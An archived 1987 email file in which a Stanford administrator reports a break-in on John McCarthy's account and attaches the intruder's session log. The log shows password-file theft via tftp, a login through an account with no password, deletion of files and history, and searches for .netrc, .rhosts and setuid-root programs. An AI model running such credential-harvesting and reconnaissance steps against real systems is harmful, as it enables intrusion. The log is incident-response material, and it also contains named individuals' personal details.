perm filename BREAKI[W87,JMC] blob
sn#835311 filedate 1987-03-01 generic text, type C, neo UTF8
COMMENT ⊗ VALID 00002 PAGES
C REC PAGE DESCRIPTION
C00001 00001
C00002 00002 ∂01-Mar-87 1307 HANSEN@Sierra.Stanford.EDU Breakin to your account on ibmrtpc1.
C00030 ENDMK
C⊗;
�∂01-Mar-87 1307 HANSEN@Sierra.Stanford.EDU Breakin to your account on ibmrtpc1.
Received: from SIERRA.STANFORD.EDU by SAIL.STANFORD.EDU with TCP; 1 Mar 87 13:07:32 PST
Date: Sun 1 Mar 87 13:05:03-PST
From: Stephen Hansen <Hansen@Sierra.Stanford.EDU>
Subject: Breakin to your account on ibmrtpc1.
To: jmc@Sail.Stanford.EDU
Message-ID: <12282987415.17.HANSEN@Sierra.Stanford.EDU>
I am sorry for the delay in getting this to you but the host table on
Talbots (my prefered address) doesn't know about sail's new address
and the MAILER-DEAMON just now bounced it back to me. I also tried
calling you friday but there was no answer.
A cracker that I have been monitoring accessed your account on ibmrtpc1
just before midnight on the 26th. The police are already on this case
as this person has been doing damage to several other on campus systems.
I am sending you an extract of my log file that shows just what was done
on the rt.
This person does have a reasonable amount of competance when it comes
to building trapdoors into a system so I would suggest that you survey
you file system carefully for any modifications. I can only monitor
this persons activities on a few systems so I can't tell if he came in
at other times directly from a tip or other system. Last night he was
using tip-mjhe line 15.
There is an investigation in progress and I would appreciate it if you
kept this information as confidential as possible.
If you have any questions please call me at x3-1058.
Stephen Hansen
ps. Considering the delay in getting this information to you please
feel free to call me at home (493-2095) if you think it necessary.
-------
∂01-Mar-87 1308 HANSEN@Sierra.Stanford.EDU Log of breakin on ibmrtpc1
Received: from SIERRA.STANFORD.EDU by SAIL.STANFORD.EDU with TCP; 1 Mar 87 13:07:59 PST
Date: Sun 1 Mar 87 13:05:30-PST
From: Stephen Hansen <Hansen@Sierra.Stanford.EDU>
Subject: Log of breakin on ibmrtpc1
To: jmc@Sail.Stanford.EDU
Message-ID: <12282987496.17.HANSEN@Sierra.Stanford.EDU>
tftp> c ibmrtpc1
tftp> get /etc/passwd p
Received 1196 bytes in 5 seconds.
tftp> q
%grep :: p
shutdown::0:0:System killer:/:/usr/local/etc/shutdown
les::10:10:Les Earnest:/usr/les:/bin/csh
jmc::11:10:John McCarthy:/usr/jmc:/bin/csh
clt::13:10:Carolyn Talcott:/usr/clt:/bin/csh
test::99:31:DTN test login:/:/usr/ucb/yes
%finger les@ibmrtpc1
[ibmrtpc1] connect: Connection refused
%rusers ibmrtpc1
↑C%telnet ibmrtpc1
Trying 36.8.0.111 ...
Connected to ibmrtpc1.
Escape character is '↑]'.
4.3 BSD UNIX (ibmrtpc1)
login: jmc
Last login: Fri Sep 12 00:19:54 from su-ai.arpa
4.2 BSD UNIX (GENERIC) #2: Mon Sep 22 14:57:20 PDT 1986
IBM Academic Information Systems 4.2
5799-CGZ (C) Copyright IBM Corporation 1986
All Rights Reserved
Licensed Materials - Property of IBM
% w
w: No namelist
% who
air console Feb 2 21:29
jmc ttyp0 Feb 4 06:45 (36.14.0.11)
% finger air
Login name: air In real life: Arkady Rabinov
Directory: /user/air Shell: /bin/csh
On since Feb 2 21:29:02 on console 8 hours 31 minutes Idle Time
No Plan.
% ls -a
. .cshrc .login alt.c alt.h alt.o test
.. .history alt alt.data alt.lsp mbox
% mail
No mail for jmc
% stty
new tty, speed 38400 baud; -tabs crt
% stty erase "↑h" intr "↑c" kil "↑u"
unknown mode: kil
unknown mode: ↑u
% stty kill "↑u"
% stty
new tty, speed 38400 baud; -tabs crt
% ls -al
total 15
drwxr-xr-x 2 jmc 512 May 21 1986 .
drwxrwxr-x 37 root 1024 Feb 3 00:03 ..
-rw-r--r-- 1 jmc 130 Feb 24 1986 .cshrc
-rwxr-xr-x 1 jmc 407 Sep 12 00:20 .history
-rw-r--r-- 1 jmc 104 May 1 1986 .login
-rw-r--r-- 1 jmc 82 May 3 1986 alt
-rw-r--r-- 1 jmc 743 May 3 1986 alt.c
-rw-r--r-- 1 jmc 20 May 3 1986 alt.data
-rw-r--r-- 1 jmc 135 May 3 1986 alt.h
-rw-r--r-- 1 jmc 82 May 3 1986 alt.lsp
-rw-r--r-- 1 jmc 2314 May 3 1986 alt.o
-rw------- 1 jmc 938 Mar 26 1986 mbox
-rw-r--r-- 1 jmc 5 Apr 3 1986 test
% cat .cshrc
set path = ( /etc /usr/ucb /bin /usr/bin . /usr/local /usr/ibmtools /usr/new )
set history = 50
set savehist = 50
alias j jobs -l
% cat .login
umask 2
alias k logout
stty new crt erase ↑H kill ↑U intr ↑C -nl
alias kcl /usr/kcl/okcl/unixport/kcl
%
% cat .profile
.profile: No such file or directory
% cat .logout
.logout: No such file or directory
% file *
alt: ascii text
alt.c: c program text
alt.data: ascii text
alt.h: ascii text
alt.lsp: ascii text
alt.o: executable not stripped
mbox: ascii text
test: ascii text
% more test
test
% cat test
test
% rm test
% more mbox
>From greep Wed Mar 26 23:44:56 1986
Received: by with Sendmail; Wed, 26 Mar 86 23:44:52 pst
Date: Wed, 26 Mar 86 23:44:52 pst
From: Steven Tepper <greep>
To: jmc
Status: RO
You can type "ps xg" to get the process id of your shell (not the
one you're logged into now! -- check tye TTY number) and then
type "kill -9 nn" where nn is the process id.
>From JMC@SU-AI.ARPA Wed Mar 26 22:30:11 1986
Received: from SU-AI.ARPA (su-ai.arpa.ARPA) by ibmpcrt1 (4.12/4.7)
id AA01379; Wed, 26 Mar 86 22:30:07 pst
Message-Id: <8603270630.AA01379@ibmpcrt1>
Date: 26 Mar 86 2229 PST
From: John McCarthy <JMC@SU-AI.ARPA>
To: jmc@IBMPCRT1
Status: RO
test
>From JMC@SU-AI.ARPA Wed Mar 26 13:21:30 1986
Received: from SU-AI.ARPA (su-ai.arpa.ARPA) by ibmpcrt1 (4.12/4.7)
id AA00169; Wed, 26 Mar 86 13:21:26 pst
Message-Id: <8603262121.AA00169@ibmpcrt1>
Date: 26 Mar 86 1320 PST
From: John McCarthy <JMC@SU-AI.ARPA>
To: jmc@IBMPCRT1
Status: RO
test
% more alt
(defun alt (u) (if (or (null u) (null (cdr u))) u (cons (car u) (alt (cddr u))))
)
% rm mbox
% ls
alt alt.c alt.data alt.h alt.lsp alt.o
% rm *
% ls -a
. .. .cshrc .history .login
% cat .history
ls
k
cat .login
cat foo
cat > foo
cat foo
cat foo .login > foo1
cat foo1
cat > foo2
cat .login foo2 > foo1
cat foo1
mv foo1 .login
cat .login
rm foo foo1 foo2
k
kcl
kcl
inger
finger
cat
cat alt
cat > alt
cat alt
kcl
k
kcl
ls
cat alt > alt.lsp
ls
kcl
ls
cat alt.c
cat alt.o
ls -ls
cat alt.lsp
cat alt.c
k
finger
k
finger
k
finger
k
kcl
k
finger
k
finger
k
k
% ls -al
total 5
drwxr-xr-x 2 jmc 512 Feb 4 06:50 .
drwxrwxr-x 37 root 1024 Feb 3 00:03 ..
-rw-r--r-- 1 jmc 130 Feb 24 1986 .cshrc
-rwxr-xr-x 1 jmc 407 Sep 12 00:20 .history
-rw-r--r-- 1 jmc 104 May 1 1986 .login
% rm .history
% umask
2
% umask 0
% cat>a
test
%Dls -l a
-rw-rw-rw- 1 jmc 5 Feb 4 06:51 a
% umask 000
% cat>a
test
%Dls -l a
-rw-rw-rw- 1 jmc 5 Feb 4 06:52 a
% umask 77
% rm a
% ls -l /etc/passwd
-rw-r--r-- 1 root 1196 Oct 20 22:54 /etc/passwd
% cat /etc/group
wheel:*:0:root
daemon:*:1:daemon
staff:*:10:root,ibmacis
operator:*:28:root
guest:*:31:root
kcl:*:32:dan
fol:*:33:dan,kcl
ibmacis:*:100:
% ls /etc/phones
/etc/phones not found
% ls -lt/etc/hosts
-rw-r--r-- 1 root 213491 Aug 26 17:18 /etc/hosts
% ls -l /etc/hosts.equiv
-rw-r--r-- 1 root 0 Mar 17 1986 /etc/hosts.equiv
% uname
uname: Command not found.
% uuname
uuname: Command not found.
% ls -a /usr/adm
. acct-pp lpd-errs newsyslog savacct wtmp
.. lastlog messages rlpacct shutdownlog
acct lpacct msgbuf rlpd-errs usracct
% ls -l /usr/adm/acct-pp
-rw-r--r-- 1 root 0 Mar 17 1986 /usr/adm/acct-pp
% ls -l /etcvwtmp
/etcvwtmp not found
% ls -l /etc/$[1mwtm$[mp
/etc/wtmp not found
% ls -l /usr/adm/wtmp
-rw-rw-rw- 1 root 77400 Feb 4 06:45 /usr/adm/wtmp
% file /us$[1mr/a$[mdm/wtmp
/usr/adm/wtmp: data
% ls -a /
. dev march31
.. etc mnt
.cshrc install_done modified.since.march31
.history install_notes nfaccess
.login install_sendapar sys
.profile install_ttys tmp
.rhosts install_uucp user
backroot lib usr
bin lost+found vmunix.std
boot make.clean
% cd /
% cat .cshrc
set path = ( /etc /usr/ucb /bin /usr/bin . /usr/local /usr/ibmtools /usr/new )
set history = 50
set savehist = 50
alias j jobs -l
% cat .login
umask 2
stty new crt erase ↑H kill ↑U intr ↑C -nl
echo "Don't login as root, use su"
% cat .profile
stty new crt erase \↑H kill \↑U intr \↑C -nl
echo 'erase ↑H, kill ↑U, intr ↑C'
PS1=`hostname`'# '; export PS1
PATH=/etc:/usr/ucb:/bin:/usr/bin:/usr/local:/usr/ibmtools:/usr/new
export PATH
HOME=/
export HOME
TERM=${TERM-ibmconsole}
export TERM
% cat .history
rm x*
exit
pwd
gnu
cd /user/gnuemacs/src
gnu
exit
chmod a+w swapgeneric.c
exit
mkdir safe
mv vmunix safe
ls .. -a
ls -a ..
ls -l ..
chown air /sys/IBMRTPC1
exit
pwd
chown air *
exit
chown air ../h/*
exit
pwd
cd ../cacons
chown air *
exit
pwd
rm -r andrew
exit
chown air vm*
ls -l vm*
exit
pwd
rm *
ls
exit
rm GENERIC/*
ls -l GENERIC/tmp
rm GENERIC/tmp/*
ls
rmdir GENERIC
rmdir GENERIC/tmp
rmdir GENERIC
du
rmdir ca
ls -l
rm *
ls -l h
rm h/*
rmdir h
exit
% finger root
Login name: root In real life: Charlie Root
Directory: / Shell: /bin/csh
Last login Mon Feb 2 16:52 on console
No Plan.
% cat .rhosts
% ls /usr/lib/uucp
L-devices L.cmds SEQF uucico uucp
L-dialcodes L.sys USERFILE uuclean uuxqt
% cd /usr/lib/uucp
% ls -l L.sys
-rw-r----- 1 uucp 131 Sep 30 1985 L.sys
% cd /usr/lib
% ls -l cron*
-rwxr-xr-x 1 root 594 May 13 1986 crontab
-r--r--r-- 1 root 661 May 13 1986 crontab.orig
% cat crontab
30 4 * * * /etc/sa -s > /dev/null
0 4 * * * calendar -
15 4 * * * find /usr/preserve -mtime +7 -a -exec rm -f {} \;
20 4 * * * find /usr/msgs -mtime +21 -a ! -perm 444 -a ! -name bounds -a -exec r
m -f {} \;
30 4 * * * /usr/lib/uucp/cleanlog
40 4 * * * find / '(' -name '#*' -o -name '*.CKP' ')' -a -atime +3 -a -exec rm -
f {} ';'
0,15,30,45 * * * * /usr/lib/atrun
0,10,20,30,40,50 * * * * /etc/dmesg - >>/usr/adm/messages
0 0 * * * su daemon < /usr/local/lib/uucp.daily
0 5,12,18 * * * su daemon < /usr/local/lib/uucp.6hours
0 0 * * * /usr/local/lib/news/expire
5 4 * * * sh /usr/adm/newsyslog
% ls -l /usr/adm/newsyslog
-rwxr-xr-x 1 daemon 279 Mar 16 1986 /usr/adm/newsyslog
% file /usr/adm/newsyslog
/usr/adm/newsyslog: commands text
% cat /usr/$[1madm/$[mnewsyslog
cd /usr/spool/mqueue
rm syslog.7
mv syslog.6 syslog.7
mv syslog.5 syslog.6
mv syslog.4 syslog.5
mv syslog.3 syslog.4
mv syslog.2 syslog.3
mv syslog.1 syslog.2
mv syslog.0 syslog.1
mv syslog syslog.0
cp /dev/null syslog
chmod 666 syslog
kill -1 `cat /etc/syslog.pid`
% pwd
/usr/lib
% cd uucp
% ls cleanlog
cleanlog not found
% ls -l ../cleanlog
../cleanlog not found
% cd /usr/spool
% ls
at lpd lplpd mqueue ppd rppd
imlpd lpd.lock mail notes rlpd rwho
% cd mail
% ls
clt kcl khanna yoram
% ls -l
total 2
-rw------- 1 clt 1170 Sep 24 13:01 clt
-rw------- 1 kcl 0 Sep 25 16:29 kcl
-rw------- 1 khanna 0 Jul 14 1986 khanna
-rw------- 1 yoram 0 Oct 4 00:05 yoram
% cd /
% pwd
/usr/jmc
% cd /usr
% ls
Adds edu ibmrtpc1 les new stanford
adm games ibmtools lib preserve sys
bin greep include local pub tmp
clt grt.bug jmc lost+found skel ucb
dan guest kcl man spool weening
dict hosts khanna mdec src
doc ibm ldir msgs stand
% finger les
Login name: les In real life: Les Earnest
Directory: /usr/les Shell: /bin/csh
Last login Wed Oct 15 12:07 on ttyp0
No Plan.
% finger clt
Login name: clt In real life: Carolyn Talcott
Directory: /usr/clt Shell: /bin/csh
Last login Wed Sep 24 12:42 on ttyp0
No Plan.
% ls /user
air dan fol greep lost+found usr
cmu edward gnuemacs kcl src yoram
% grep clt /etc/passwd
clt::13:10:Carolyn Talcott:/usr/clt:/bin/csh
% grep les /etc/passwd
les::10:10:Les Earnest:/usr/les:/bin/csh
% grep jmc /etc/passwd
jmc::11:10:John McCarthy:/usr/jmc:/bin/csh
% passwd
Changing password for jmc
New password:
Retype new password:
% who
air console Feb 2 21:29
jmc ttyp0 Feb 4 06:45 (36.14.0.11)
% rusers
rusers: Command not found.
% telnet
telnet> q
% rwho
% find / -name '.netrc' -print > netrc &
[1] 2555
% pwd
/usr
% cd
% $[1mls$[m -a
% ls /usr/netrc
/usr/netrc
% kill 2555
% rm /usr/netrc
[1] + Terminated find / -name .netrc -print > netrc
% find / -name '.netrc' -print > netrc &
[1] 2562
% find / -name '.rhosts' -print > rhosts &
[2] 2565
% find / -perm -4000 -user root -print > perm &
[3] 2568
% ps
/vmunix: No namelist
% ls /tmp
lost+found sys
% finger
Login Name TTY Idle When Office
air Arkady Rabinov co 8:51 Mon 21:29
jmc John McCarthy p0 Wed 06:45
% cu
usage: cu telno [-t] [-s speed] [-a acu] [-l line] [-#]
% ls
netrc perm rhosts
% ls -l
total 0
-rw------- 1 jmc 0 Feb 4 07:04 netrc
-rw------- 1 jmc 0 Feb 4 07:05 perm
-rw------- 1 jmc 0 Feb 4 07:05 rhosts
% fin$[1mg$[mer jmc@portia
Login name: jmc@portia In real life: ???
% telnet portia 79
Trying...
Connected to portia.
Escape character is '↑]'.
jmc
Login name: jmc In real life: ???
Connection closed by foreign host.
% telnet portia 79
Trying...
Connected to portia.
Escape character is '↑]'.
les
Login name: les In real life: ???
Connection closed by foreign host.
[1] Done find / -name .netrc -print > netrc
% ls -l
total 1
-rw------- 1 jmc 0 Feb 4 07:04 netrc
-rw------- 1 jmc 0 Feb 4 07:05 perm
-rw------- 1 jmc 107 Feb 4 07:08 rhosts
[2] - Done find / -name .rhosts -print > rhosts
% tftp portia
tftp> get /etc/passwd p
Error code 2: Access violation
tftp> q
[3] + Done find / -perm -4000 -user root -print > perm
% ls -l
total 2
-rw------- 1 jmc 0 Feb 4 07:04 netrc
-rw------- 1 jmc 0 Feb 4 07:09 p
-rw------- 1 jmc 517 Feb 4 07:09 perm
-rw------- 1 jmc 107 Feb 4 07:08 rhosts
% rm netrc p
% cat rhosts
/usr/src/root/.rhosts
/usr/les/.rhosts
/usr/greep/.rhosts
/usr/ibmrtpc1/.rhosts
/user/air/.rhosts
/.rhosts
% cat perm
/bin/chgrp
/bin/df
/bin/login
/bin/mail
/bin/passwd
/bin/su
/usr/lib/ex3.7recover
/usr/lib/ex3.7preserve
/usr/lib/sendmail
/usr/lib/lpd
/usr/ucb/chfn
/usr/ucb/chsh
/usr/ucb/rcp
/usr/ucb/rsh
/usr/ucb/quota
/usr/ucb/lpr
/usr/ucb/lpq
/usr/ucb/lprm
/usr/ucb/rlogin
/usr/ucb/rdist
/usr/ldir/etc/rrestore
/user/usr/ucb/chfn
/user/usr/ucb/chsh
/user/usr/ucb/rcp
/user/usr/ucb/rsh
/user/usr/ucb/quota
/user/usr/ucb/lpr
/user/usr/ucb/lpq
/user/usr/ucb/lprm
/user/usr/ucb/rlogin
/user/usr/ucb/rdist
/user/usr/ldir/etc/rrestore
% man rdist
RDIST(1) UNIX Programmer's Manual RDIST(1)
NAME
rdist - remote file distribution program
SYNOPSIS
rdist [ -DnqbRvwyhi ] [ -f distfile ] [ -d var=value ] [
name ... ]
rdist [ -DnqbRvwyhi ] -c name ... host[.login][:dest]
DESCRIPTION
Rdist is a program to maintain identical copies of files
over multiple hosts. It preserves the owner, group, mode,
and mtime of files if possible and can update programs that
are executing. Rdist reads commands from distfile to direct
the updating of files and/or directories. If distfile is
`-', the standard input is used. If no -f option is
present, the file `distfile' is used for input. If no names
are specified on the command line, rdist will update all of
the files and directories listed in distfile. Otherwise,
% ls -l
total 2
-rw------- 1 jmc 517 Feb 4 07:09 perm
-rw------- 1 jmc 107 Feb 4 07:08 rhosts
% ls -al
total 6
drwxr-xr-x 2 jmc 512 Feb 4 07:10 .
drwxrwxr-x 37 root 1024 Feb 4 07:04 ..
-rw-r--r-- 1 jmc 130 Feb 24 1986 .cshrc
-rw-r--r-- 1 jmc 104 May 1 1986 .login
-rw------- 1 jmc 517 Feb 4 07:09 perm
-rw------- 1 jmc 107 Feb 4 07:08 rhosts
% tftp irisrt8c
irisrt8: unknown host
tftp> tftp> status
Not connected.
Mode: netascii Verbose: off Tracing: off
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
tftp> q
% rusers
rusers: Command not found.
% rwho cobra
% rlogin cobra
cobra: unknown host
% rlogin cobra.stanford.edu
cobra.stanford.edu: unknown host
% logout
Connection closed by foreign host.
-------